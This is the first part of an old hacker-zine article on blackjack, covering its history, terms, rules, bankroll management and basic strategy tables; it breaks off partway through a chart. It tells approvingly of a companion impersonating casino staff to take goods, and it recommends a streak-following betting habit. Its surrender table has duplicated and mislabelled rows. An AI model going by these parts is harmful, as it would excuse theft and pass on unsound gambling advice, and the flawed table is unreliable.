+topics has been presented. Due to email file size restrictions, I had to
+divide this article into two parts. Note that I am NOT a Professional
+BlackJack player, the definition being someone whose livelihood is derived
+solely from his/her winnings. I did however, dedicate a summer to gambling 5
+evenings a week or so, keeping meticulous records of wins, losses and expenses
+incurred. I averaged 1-2 nights a week playing BlackJack with the other nights
+divided among 3 different forms of Pari-Mutual gambling. At the end of the
+summer I tallied the wins/losses/expenses and am proud to say the result was a
+positive net earnings. Unfortunately it was instantly apparent that the net
+money when divided up by the number of weeks gambling was not enough to
+warrant me to quit school and become a professional gambler. Besides that
+one summer, I have played BlackJack off and on for 7 years or so. In case you
+were wondering, no, I have never been a member of GA [Gamblers Anonymous]
+contrary to what one of those Bell Security "Hit-Lists" circulated many years
+ago would have you believe. The topics contained herein are:
+
+     o    Historical Background of the BlackJack Card Game
+     o    Useful Gambling, Casino, and BlackJack Definitions
+     o    Review of BlackJack Rules of Play
+     o    Betting, Money Management, and the Psychology of Gambling
+     o    Basic Strategy (End of Part 1)
+     o    Card Counting (Beginning of Part 2)
+     o    Shuffle Tracking
+     o    Casino Security and Surveillance
+     o    "Social Engineering" the Casino
+     o    Casino Cheating and Player Cheating
+     o    Some Comments Regarding Computer BlackJack Games for PC's
+     o    A VERY Brief Description of Other Casino Games
+     o    Selected Bibliography and Reference List
+
+Notes:
+
+     a) I made extensive use of my many books, articles, and magazines on
+gambling and BlackJack along with actual playing experience. References are
+denoted by square brackets [REF#] and are listed in the Selected Bibliography
+and Reference List section.
+
+     b) It's hard to win at something you don't understand. If you want to win
+consistently at anything, learn every thing you can about it. BlackJack is no
+exception.
+
+
+History of BlackJack:
+---------------------
+
+   I provide this historical background information because I find it rather
+fascinating and it also provides some insight into contemporary rules and
+play. I think it is worth reading for the sole reason that you might some day
+use one of the historical tid-bits to answer a question on Jeopardy!#@%!
+Seriously, the first couple of paragraphs may read a bit like a book report,
+but bear with it if you can as I did all of the following research
+specifically for this file.
+
+   First, a brief history of cards: Playing cards are believed to have been
+invented in China and/or India sometime around 900 A.D. The Chinese are
+thought to have originated card games when they began shuffling paper money
+(another Chinese invention) into various combinations. In China today, the
+general term for playing cards means "paper tickets". The contemporary 52 card
+deck used in the U.S. was originally referred to as the "French Pack" (circa
+1600's) which was later adopted by the English and subsequently the Americans.
+
+   The first accounts of gambling were in 2300 B.C. or so, and yes, the
+Chinese again get the credit. Gambling was very popular in Ancient Greece even
+though it was illegal and has been a part of the human experience ever since.
+Today, with the all too common manipulation of language to suit one's own
+purposes, gambling is no longer a term used by casinos....they prefer to use
+the word GAMING instead. Just as Post Traumatic Stress Disorder has replaced
+the term Shell Shock in military jargon. Since this manipulation of language
+is all the rage these days, why don't we water down the name Computer Hacker
+and replace it with Misguided Information Junky or someone who is afflicted
+with a Compulsive Curiosity Disorder?
+
+   The history of the BlackJack card game itself is still disputed but was
+probably spawned from other French games such as "chemin de fer and French
+Ferme", both of which I am completely unfamiliar with. BlackJack originated in
+French Casino's around 1700 where it was called "vingt-et-un" ("twenty-and-
+one" in French) and has been played in the U.S. since the 1800's. BlackJack is
+called Black-Jack because if a player got a Jack of Spades and an Ace of
+Spades as the first two cards (Spade being the color black of course), the
+player was additionally remunerated.
+
+   Gambling was legal out West from the 1850's to 1910 at which time Nevada
+made it a felony to operate a gambling game. In 1931, Nevada re-legalized
+casino gambling where BlackJack became one of the primary games of chance
+offered to gamblers. As some of you may recall, 1978 was the year casino
+gambling was legalized in Atlantic City, New Jersey. As of 1989, only two
+states had legalized casino gambling. Since then, about 20 states have a
+number of small time casinos (compared to Vegas) which have sprouted up in
+places such as Black Hawk and Cripple Creek Colorado and in river boats on the
+Mississippi. Also as of this writing, roughly 70 Native American Indian
+reservations operate or are building casinos, some of which are in New York
+and Connecticut. In addition to the U.S., some of the countries (there are
+many) operating casinos are: France, England, Monaco (Monte Carlo of course)
+and quite a few in the Caribbean islands (Puerto Rico, Bahamas, Aruba, etc.).
+
+   Now: The first recognized effort to apply mathematics to BlackJack began in
+1953 and culminated in 1956 with a published paper [6]. Roger Baldwin et al
+(see Bibliography) wrote a paper in the Journal of the American Statistical
+Association titled "The Optimum Strategy in BlackJack". These pioneers used
+calculators, and probability and statistics theory to substantially reduce the
+house advantage. Although the title of their paper was 'optimum strategy', it
+wasn't really the best strategy because they really needed a computer to
+refine their system. I dug up a copy of their paper from the library, it is
+ten pages long and fairly mathematical. To give you an idea of its importance,
+the Baldwin article did for BlackJack playing what the November 1960 issue of
+The Bell System Technical Journal entitled, "Signalling Systems for Control of
+Telephone Switching", did for Blue Boxing.
+
+   To continue with the analogy, one can consider Professor Edward O. Thorp to
+be the Captain Crunch of BlackJack. Dr. Thorp, then a mathematics teacher,
+picked up where Baldwin and company left off. In 1962, Thorp refined their
+basic strategy and developed the first card counting techniques. He published
+his results in "Beat the Dealer" [3], a book that became so popular that for a
+week in 1963 it was on the New York Time's best seller list. The book also
+scared the hell out of the Casino's. Thorp wrote "Beat the Market" in 1967, in
+which he used mathematics and computer algorithms to find pricing
+inefficiencies between stocks and related securities. Currently he is using an
+arbitrage formula to exploit undervalued warrants in the Japanese stock
+market.
+
+   The Casinos were so scared after Beat the Dealer, that they even changed
+the rules of the game to make if more difficult for the players to win. This
+didn't last long as people protested by not playing the new pseudo-BlackJack.
+The unfavorable rules resulted in a loss of income for the casinos. Not making
+money is a sin for a casino, so they quickly reverted back to the original
+rules. Because Thorp's "Ten-Count" method wasn't easy to master and many
+people didn't really understand it anyway, the casinos made a bundle from the
+game's newly gained popularity thanks to Thorp's book and all the media
+attention it generated.
+
+   Beat the Dealer is rather difficult to find these days, I picked up a copy
+at the library recently and checked the card in the back to see how popular
+it is today. I was surprised as hell to find that it was checked out over 20
+times in the past year and a half or so! How many books from 1962 can claim
+that? I do not recommend reading the book for anything other than posterity
+purposes though, the reason being that newer books contain better, and easier
+to learn strategies.
+
+   Another major contributor in the history of winning BlackJack play is
+Julian Braun who worked at IBM. His thousands of lines of computer code and
+hours of BlackJack simulation on IBM mainframes resulted in THE Basic
+Strategy, and a number of card counting techniques. His conclusions were used
+in a 2nd edition of Beat the Dealer, and later in Lawrence Revere's 1977 book
+"Playing BlackJack as a Business".
+
+   Lastly, let me mention Ken Uston, who used five computers that were built
+into the shoes of members of his playing team in 1977. They won over a hundred
+thousand dollars in a very short time but one of the computers was
+confiscated and sent to the FBI. The fedz decided that the computer used
+public information on BlackJack playing and was not a cheating device. You may
+have seen this story in a movie made about his BlackJack exploits detailed in
+his book "The Big Player". Ken was also featured on a 1981 Sixty Minutes show
+and helped lead a successful legal challenge to prevent Atlantic City casinos
+from barring card counters.
+
+
+Useful Definitions:
+-------------------
+
+   Just as in Social Engineering the Phone Company, an essential element for
+success is knowing the right buzzwords and acronyms. Therefore, I list some
+relevant definitions now, even though the reader will probably skip over them
+to get to the good stuff. The definitions merely serve as a reference for
+those who are uninitiated with the terminology of gambling, casinos, and
+BlackJack. If you encounter a term you don't understand in the article, look
+back here. The definitions are not in alphabetical order on purpose. I grouped
+them in what I feel is a logical and easy to remember fashion.
+
+Action: This is a general gambling term which refers to the total amount of
+        money bet in a specific period of time. Ten bets of ten dollars each
+        is $100 of action.
+
+Burn Card: A single card taken from the top of the deck or the first card in
+           a shoe which the dealer slides across the table from his/her left
+           to the right, and is placed into the discard tray. The card may or
+           may not be shown face up (which can affect the count if you are
+           counting cards). A card is burned after each shuffle. I have
+           not been able to find out how this started nor the purpose for
+           burning a card. If you know, drop me some email.
+
+Cut Card: A solid colored card typically a piece of plastic which is given to
+          a player by the dealer for the purpose of cutting the deck(s) after
+          a shuffle. Cutting the cards in the 'right' location is part of
+          the 'shuffle tracking' strategy mentioned later in Part 2.
+
+Hole Card: Any face down card. The definition most often refers to the
+           dealer's single face down card however.
+
+Shoe: A device that can hold up to eight decks of cards which allows the
+      dealer to slide out the cards one at a time.
+
+Hard Hand: A hand in which any Ace is counted as a 1 and not as an 11.
+
+Soft Hand: A hand in which any Ace is counted as an 11 and not as a 1.
+
+Pat Hand: A hand with a total of 17 to 21.
+
+Stand: To decline another card.
+
+Hit: To request another card.
+
+Bust: When a hand's value exceeds 21....a losing hand.
+
+Push: A player-dealer tie.
+
+Pair: When a player's first two cards are numerically identical (ie, 7,7).
+
+Point Count: The net value of the card count at the end of a hand.
+
+Running Count: The count from the beginning of the deck or shoe. The running
+               count is updated by the value of the point count after each
+               hand.
+
+True Count: The running count adjusted to account for the number of cards left
+            in the deck or shoe to be played.
+
+Bankroll: The stake (available money) a player plans to bet with.
+
+Flat Bet: A bet which you do not vary ie, if you are flat betting ten dollars,
+          you are betting $10 each and every hand without changing the betting
+          amount from one hand to the next.
+
+Black Chip: A $100. chip.
+
+Green Chip: A $25.00 chip.
+
+Red Chip: A $5.00 chip.
+
+Foreign Chip: A chip that is issued by one casino and is honored by another
+              as cash. A casino is not necessarily obligated to accept them.
+
+Settlement: The resolving of the bet. Either the dealer takes your chips,
+            pays you, or in the case of a push, no exchange of chips occurs.
+
+Toke: Its not what some of you may think...to "toke" the dealer is just
+      another word for tipping the dealer.
+
+Marker: An IOU. A line of credit provided by the casino to a player.
+
+Junket: An organized group of gamblers that travel to a casino together.
+        Junkets are usually subsidized by a casino to attract players.
+
+Comp: Short for complimentary. If you wave lots of money around, the casino
+      (hotel) may give you things like a free room or free f00d hoping you'll
+      keep losing money at the tables in their casino.
+
+Heat: The pressure a casino puts on a winning player, typically someone who
+      is suspected of being a card counter.
+
+Shuffle Up: Prematurely shuffling the cards to harass a player who is usually
+            suspected of being a counter.
+
+Nut: The overhead costs of running the casino.
+
+Pit: The area inside a group of gaming tables. The tables are arranged in
+     an elliptical manner, the space inside the perimeter is the pit.
+
+House: The Casino of course.
+
+Cage: Short for cashier's cage. This is where chips are redeemed for cash,
+      checks cashed, credit arranged, etc.
+
+House Percentage: The casino's advantage in a particular game of chance.
+
+Drop Percentage: That portion of the player's money that the casino will win
+                 because of the house percentage. It is a measure of the
+                 amount of a player's initial stake that he or she will
+                 eventually lose. On average this number is around 20 percent.
+                 That is, on average, Joe Gambler will lose $20 of every $100
+                 he begins with.
+
+Head-On: To play alone at a BlackJack table with the dealer.
+
+WAG Player: Wild Assed Guessing player.
+
+SWAG Player: Scientific Wild Assed Guessing player.
+
+Tough Player: What the casino labels an '3L33T' player who can hurt the casino
+              monetarily with his or her intelligent play.
+
+Counter: Someone who counts cards.
+
+High Roller: A big bettor.
+
+Mechanic: Someone who is elite in regards to manipulating cards, typically for
+          illicit purposes.
+
+Shill: A house employee who bets money and pretends to be a player to attract
+       customers. Shills typically follow the same rules as the dealer which
+       makes them somewhat easy to spot (ie, they don't Double Down or Split).
+
+Pit Boss: An employee of the casino whose job is to supervise BlackJack
+          players, dealers, and other floor personnel.
+
+
+Review of BlackJack Rules of Play:
+----------------------------------
+
+   The rules of BlackJack differ slightly from area to area and/or from casino
+to casino. For example, a casino in downtown Vegas may have different rules
+than one of the Vegas Strip casinos which may have different rules from a
+casino up in Reno or Tahoe (Nevada). The rules in a casino in Freeport Bahamas
+may differ from those in Atlantic City, etc. Therefore, it is important to
+research, a priori, what the rules are for the area/casino(s) you plan on
+playing in. For Nevada casinos you can order a copy of [1] which contains
+rules info on all the licensed casinos in the state. Later in this article,
+you will see that each set of rule variations has a corresponding Basic
+Strategy chart that must be memorized. Memorizing all the charts can be too
+confusing and is not recommended.
+
+   The BlackJack table seats a dealer and one to seven players. The first seat
+on the dealer's left is referred to as First Base, the first seat on the
+dealer's right is referred to as Third Base. A betting square is printed on
+the felt table in front of each player seat. Immediately in front of the
+dealer is the chip tray. On the dealer's left is the deck or shoe and beside
+that should be the minimum bet sign--something that you ought to read before
+sitting down to play. On the dealer's immediate right is the money drop slot
+where all currency and tips (chips) are deposited. Next to the drop slot is
+the discard tray. Play begins after the following ritual is completed: the
+dealer shuffles the cards, the deck(s) is "cut" by a player using the marker
+card, and the dealer "burns" a card.
+
+   Before any cards are dealt, the players may make a wager by placing the
+desired chips (value and number) into the betting box. I used the word "may"
+because you are not forced to bet every hand. Occasionally a player may sit
+out a hand or two for various reasons. I have sat out a couple of hands at
+times when the dealer was getting extremely lucky and everyone was losing. If
+you attempt to sit out too many hands especially if there are people waiting
+to play at your table, you may be asked to leave the table until you are ready
+to play. If you don't have any chips, put some cash on the table and the
+dealer will exchange them for chips.
+
+   Once all the bets are down, two cards (one at a time) are dealt from left
+to right. In many Vegas casinos, players get both cards face down. In Atlantic
+City and most every where else the player's cards are dealt face up. Should
+the cards be dealt face up, don't make the faux pas of touching them! They are
+dealt face up for a reason, primarily to prevent a few types of player
+cheating (see section on cheating in Part 2) and the dealer will sternly but
+nicely tell you not to touch the cards. As most of you know the dealer receives
+one card down and one card up. The numerical values of the cards are:
+(10, J, Q, K) = 10 ; (Ace) = 1 or 11 ; (other cards) = face value (3 = 3).
+
+   Since a casino can be as noisy as an old Step-by-Step Switch with all those
+slot machines going, marbles jumping around on roulette wheels, demoniacal
+shrieks of "YO-LEVEN" at the craps table, people screaming that they hit the
+big one and so on, hand signals are usually the preferred method of signalling
+hit, stand, etc.
+
+   If the cards were dealt face down and you want a hit, lightly flick the
+cards across the felt two times. If the cards were dealt face up, point at the
+cards with a quick stabbing motion. You may also want to nod your head yes
+while saying "hit".  The best way to indicate to the dealer that you want to
+stand regardless of how the cards were dealt is to move your hand from left
+to right in a level attitude with your palm down. Your hand should be a few
+inches or so above the table. Nodding your head no at the same time helps,
+while saying "stay" or "stand".
+
+   Permit me to interject a comment on the number of decks used in a game.
+Single deck games are pretty much restricted to Nevada casinos. In the casinos
+that have one-deck games, the tables are usually full. Multiple deck games
+typically consist of an even number of decks (2, 4, 6, 8) although a few
+casinos use 5 or 7 decks. The two main reasons many casinos use multiple decks
+are:
+      1) They allow the dealer to deal more hands per hour thereby increasing
+         the casino take.
+
+      2) They reduce but in no way eliminate the player advantage gained
+         from card counting.
+
+   Dealer Rules - The rules the dealer must play by are very simple. If the
+dealer's hand is 16 or less, he/she must take a card. If the dealer's hand is
+17 or more, he/she must stand. Note that some casinos allow the dealer to hit
+on soft 17 which gives the house a very small additional advantage. The
+dealer's strategy is fixed and what you and the other players have is
+immaterial to him/her as far as hitting and standing is concerned.
+
+   Player rules - The player can do whatever he/she wants as far as hitting and
+standing goes with the exception of the following special circumstances. See
+the section on Basic Strategy for the appropriate times to hit, stand, split,
+and double down. The aim is to have a hand which is higher than the dealers'.
+If there is a tie (push), neither you nor the dealer wins. Should a player get
+a BlackJack (first 2 cards are an Ace and a ten) the payoff is 150% more than
+the original bet ie, bet $10.00 and the payoff is $15.00.
+
+DOUBLE DOWN: Doubling down is restricted to 2-card hands usually totalling
+9, 10, or 11 although some casinos allow doubling down on any 2-card hand. If
+your first two cards provide you with the appropriate total and your cards
+were dealt face down, turn them over and put them on the dealer's side of the
+betting square. If your first two cards provide you with the appropriate total
+and your cards were dealt face up, point to them and say "double" when the
+dealer prompts you for a card and simultaneously put an equal amount of chips
+NEXT TO (not on top of) those already in the betting box. The dealer will give
+you one more card only, then he/she will move on to the next hand.
+
+SPLITTING PAIRS: If you have a pair that you want to split and your cards are
+dealt face down, turn them over and place them a few inches apart. If your
+cards were dealt face up, point to your cards and say "split" when the dealer
+prompts you for a card. The original bet will go with one card and you will
+have to place an equal amount of chips in the betting box near the other card.
+You are now playing two hands, each as though they were regular hands with the
+exception being that if you have just split two aces. In that case, you only
+get one card which will hopefully be a 10. If it is a ten, that hand's total
+is now 21 but the hand isn't considered a BlackJack. That is, you are paid 1:1
+and not 1:1.5 as for a natural (BlackJack).
+
+Combined example of above two plays: Say you are dealt two fives. You split
+them (you dummy!). The next card is another 5 and you re-split them (you
+chucklehead!!). Three hands have grown out of one AND you are now in for
+three times your original bet. But wait. Say the next card is a six. So one
+hand is a 5,6 which gives you eleven; another just has a 5 and the other hand
+has a 5. You decide to double down on the first hand. You are dealt a 7 giving
+18 which you stand on. Now a ten is dealt for the second hand and you decide
+to stay at 15. The last hand is the lonely third 5, which is dealt a four for
+a total of nine. You decide to double down and get an eight giving that hand a
+total of 17. Shit you say, you started with a twenty dollar bet and now you
+are in for a hundred! Better hope the dealer doesn't end up with a hand more
+than 18 lest you lose a C-note. The moral of this example is to not get caught
+up in the excitement and make rash decisions. However, there have been a
+couple of times where Basic Strategy dictated that certain split and double
+down plays should be made and I was very low on chips (and cash). Unless you
+are *really* psychic, don't go against Basic Strategy! I didn't and usually
+came out the better for it although I was really sweating the outcome of the
+hand due to my low cash status. The reason it was stupid to split two fives is
+that you are replacing a hand that is great for drawing on or doubling down
+on, by what will probably be two shitty hands.
+
+INSURANCE: This option comes into play when the dealer's up card is an Ace. At
+this point all the players have two cards. The dealer does not check his/her
+hole card before asking the players if they want insurance. The reason being
+evident as the dealer can't give away the value of the hole card if the dealer
+doesn't know what the hole card is. If a player wants insurance, half the
+original amount bet is placed on the semicircle labeled "insurance" which is
+printed on the table. If the dealer has a BlackJack the player wins the side
+bet (the insurance bet) but loses the original bet, thus providing no net loss
+or gain since insurance pays 2 to 1. If the dealer does not have a BlackJack,
+the side bet is lost and the hand is played normally. If you are not counting
+cards DO NOT TAKE INSURANCE! The proper Basic Strategy play is to decline. The
+time to take insurance is when the number of non-tens to tens drops below a
+2 to 1 margin since insurance pays 2 to 1. It's simple math check it yourself.
+
+SURRENDER: This is a fairly obscure option that originated in Manila
+(Philippines) in 1958 and isn't available in many casinos. There are two
+versions, "early surrender" and "late surrender". Early surrender  allows
+players to quit two-card hands after seeing the up card of the dealer. This
+option provides the player an additional 0.62 percent favorable advantage
+(significant) and therefore the obvious reason why many Atlantic City casinos
+abandoned the option in 1982. Late surrender is the same as early except that
+the player must wait until the dealer checks for a BlackJack. If the dealer
+does not have a BlackJack then the player may surrender. The following table
+was taken verbatim from [5] and is valid for games with 4+ decks. It details
+the best strategy regarding late surrender as determined from intensive
+computer simulation:
+
+        TWO-CARD HAND           TOTAL           DEALER'S UP-CARD
+        -------------           -----           ----------------
+             9,7                 16                    ACE
+             10,6 *              16 *                  ACE
+             9,7 *               16 *                  10
+             10,6 *              16 *                  10
+             9,7 *               16 *                  10
+             10,5 *              15 *                  10
+             9,7                 16                     9
+             10,5                16                     9
+
+        "In a single-deck game, you would surrender only the above hands
+         marked with an asterisk, as well as 7,7 against a dealer's 10
+         up-card." [5]
+
+Casino variations - Note that some casinos do not permit doubling down on
+split pairs, and/or re-splitting pairs. These options provide the player with
+a slight additional advantage.
+
+
+Betting, Money Management, and the Psychology of Gambling:
+----------------------------------------------------------
+
+   Let me begin this section with the following statement: SCARED MONEY RARELY
+WINS. Most gambling books devote quite a bit of time to the psychology of
+gambling and rightfully so. There is a fine line to responsible gambling. On
+one hand you shouldn't bet money that you cannot afford to lose. On the other
+hand, if you are betting with money you expect to lose, where is your
+confidence? When I used to gamble, it was small time. I define small time as
+bringing $250.00 of 'losable' money. I've lost that much in one night. I
+didn't like it, but I still ate that week. One pitfall you can easily fall
+into happens AFTER you lose. You scold yourself for losing money you could
+have done something productive with. "DAMN, I could have bought a 200 MB hard
+drive with that!#&!". You should think about these things BEFORE you play.
+
+   Scared money is more in the mind than real. What I mean by that is even if
+you gamble with your last $10.00 in the world, it is important to play as
+though you have thousands of dollars in front of you. I don't mean piss the
+ten bucks away. I mean that there are certain plays you should make according
+to your chosen strategy which are the optimum mathematically. Don't make
+changes to it out of fear. Fear is not your friend.
+
+   The "risk of ruin" is the percent chance that you will lose your entire
+bankroll. This percentage should not exceed 5% if you plan on playing multiple
+sessions to make money. The risk of ruin is dependent on the sizes of your
+bets during a session. The "Kelly Criterion" provides a zero percent risk of
+ruin. The system requires that you bet according to the percent advantage you
+have at any one time. For example, if you are counting cards and your
+advantage for a certain hand is 2% then you may bet 2% of your total bankroll.
+If your total is $1000. then you can bet $20. Note that if you won the hand
+your bankroll is now $1020 and if your advantage dropped to 1.5%, taking .015
+times 1020 (which will determine your next bet size) in your head isn't all
+that easy. The literature provides more reasonable systems, but do yourself a
+favor and stay away from "betting progressions". See Reference [16] (available
+on the Internet) for more information regarding risk of ruin & optimal wagers.
+
+   If you are gambling to make money, it is important to define how much cash
+you can lose before quitting. This number is called the "stop-loss limit". My
+stop-loss limit was my entire session bankroll which was $250 (50 betting
+units of $5.00 or 25 betting units of $10.00). This concept is especially
+important if you expect to play in the casinos for more than one session. Most
+books recommend that your session bankroll be about a fifth of your trip
+bankroll. Unfortunately, most people who have $500 in their wallet with a self
+imposed stop-loss limit is $200 will violate that limit should they lose the
+two hundred. Discipline is what separates the great players from the ordinary
+ones.
+
+   Obviously you don't want to put a limit on how much you want to win.
+However, if you are keeping with a structured system there are certain limits
+to what your minimum and maximum bets should be. I am not going to go into
+that here though.
+
+   In my gambling experience, there has been one non-scientific concept that
+has proven itself over and over again. NEVER BUCK A TREND! If you have just
+won three hands in a row, don't think that you are now 'due' for a loss and
+drastically scale back your bet. If you are winning go with it. A good friend
+of mine who was my 'gambling mentor' won $30,000 in a 24 hour period with a
+$200 beginning bankroll. This was not accomplished by scaling back bets. By
+the same token, if you see that the players at a certain table are losing
+consistently, don't sit down at that table. One problem that I've seen is when
+someone has won a lot and starts to lose. Mentally, they keep saying, "if I
+lose another $100 I will stop". They lose the hundred and say "no, really, the
+NEXT $100 I lose, I will stop", etc. When they go broke, that's when they stop.
+Live by the following graph typically designated as The Quitting Curve and you
+won't fall into that trap:
+
+                    |             *                  <-+
+                    |            *  *                  |   Loss
+                 ^  |           *    *                 |   Limit
+                 |  |          *      * <----QUIT!   <-+
+                 |  |         *
+                 W  |        *
+                 i  |       *
+                 n  |      *
+                 n  |     *
+                 i  |    *
+                 n  |   *
+                 g  |  *
+                    |
+                    |_________________________________________
+                              Time ---------------->
+
+   Determine your loss limit and stay with it. Obviously the loss limit will
+change as you keep winning. Standard loss limits are 10 to 20 percent of the
+current bankroll. Note that this philosophy is also used in stock market
+speculation.
+
+
+Basic Strategy:
+---------------
+
+    If you only read one section of this file, and you don't already know what
+Basic Strategy is, then this is the section you should read. Knowing Basic
+Strategy is CRITICAL to you gaining an advantage over the house. The Basic
+Strategy for a particular set of rules was developed by intensive computer
+simulation which performed a complete combinatorial analysis. The computer
+"played" tens of thousands of hands for each BlackJack situation possible and
+statistically decided as to which play decision favored the player. The
+following 3 charts should be duplicated or cut out from a hardcopy of this
+file. You don't want to wave them around at a BlackJack table but its nice to
+have them on hand in case you fail to recall some plays, at which time you can
+run to the rest room to refresh your memory.
+
+   I hope you don't think this is weird but I keep a copy of a certain Basic
+Strategy chart in my wallet at ALL times...just in case. Just in case of what
+you ask? Permit me to go off on a slight(?) tangent. The following story really
+happened. In 1984 I was visiting LOD BBS co-sysop, Paul Muad'dib up in New York
+City. After about a week we were very low on cash despite the Pay Phone
+windfall mentioned in my Phrack Pro-Phile ;->. I contacted a friend of mine
+who was working in New Jersey and he offered us a job for a couple of days. I
+spent just about the last of my cash on bus fair for me and Paul figuring that
+I would be getting more money soon. Some how, the destination was
+miscommunicated and we ended up in Atlantic City, which was not the location of
+the job. We were stuck. Our only recourse was to attempt to win some money to
+get us back on track. First we needed a little more capital. Paul, being known
+to physically impersonate phone company workers, and a Department of Motor
+Vehicles computer technician among others, decided to impersonate a casino
+employee so he could "look around". Look around he did, found a storage closet
+with a portable cooler and a case of warm soda, not exactly a gold mine but
+hey. He proceeded to walk that stuff right out of the casino. We commandeered
+some ice and walked around the beach for an hour selling sodas. It wasn't all
+that bad as scantily clad women seemed to be the ones buying them. To cut the
+story short, Paul knew ESS but he didn't know BlackJack. He lost and we
+resorted to calling up Sharp Razor, a fellow Legion member residing in NJ, who
+gave us (or is it lent?) the cash to continue our journey. For the record, I
+was fairly clueless about BlackJack at the time which really means that I
+thought I knew how to play but really didn't because I didn't even know Basic
+Strategy. The same goes for Paul. Had we had a chart on hand, we would at least
+have made the correct plays.
+
+   Here are the charts, memorize the one that is appropriate:
+
+
+                    Las Vegas Single Deck Basic Strategy Table
+
+                                Dealer's Up-Card
+               Your  +---+---+---+---+---+---+---+---+----+---+
+               Hand  | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               |  8  | H | H | H | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               |  9  | D | D | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 10  | D | D | D | D | D | D | D | D |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 11  | D | D | D | D | D | D | D | D |  D | D |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 12  | H | H | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 13  | S | S | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 14  | S | S | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 15  | S | S | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 16  | S | S | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 17  | S | S | S | S | S | S | S | S |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,2 | H | H | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,3 | H | H | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,4 | H | H | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,5 | H | H | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,6 | D | D | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,7 | S | D | D | D | D | S | S | H |  H | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,8 | S | S | S | S | D | S | S | S |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,9 | S | S | S | S | S | S | S | S |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,A | P | P | P | P | P | P | P | P |  P | P |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 2,2 | H | P | P | P | P | P | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 3,3 | H | H | P | P | P | P | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 4,4 | H | H | H | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 6,6 | P | P | P | P | P | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 7,7 | P | P | P | P | P | P | H | H |  S | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 8,8 | P | P | P | P | P | P | P | P |  P | P |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 9,9 | P | P | P | P | P | S | P | P |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               |10,10| S | S | S | S | S | S | S | S |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               H = Hit  S = Stand   D = Double Down   P = Split
+
+
+
+                  Las Vegas Multiple Deck Basic Strategy Table
+
+                                Dealer's Up-Card
+               Your  +---+---+---+---+---+---+---+---+----+---+
+               Hand  | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               |  8  | H | H | H | H | H | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               |  9  | H | D | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 10  | D | D | D | D | D | D | D | D |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 11  | D | D | D | D | D | D | D | D |  D | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 12  | H | H | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 13  | S | S | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 14  | S | S | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 15  | S | S | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 16  | S | S | S | S | S | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 17  | S | S | S | S | S | S | S | S |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,2 | H | H | H | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,3 | H | H | H | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,4 | H | H | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,5 | H | H | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,6 | H | D | D | D | D | H | H | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,7 | S | D | D | D | D | S | S | H |  H | H |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,8 | S | S | S | S | S | S | S | S |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,9 | S | S | S | S | S | S | S | S |  S | S |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | A,A | P | P | P | P | P | P | P | P |  P | P |
+               +-----+---+---+---+---+---+---+---+---+----+---+
+               | 2,2 | H | H | P | P | P | P | H | H |  H | H |
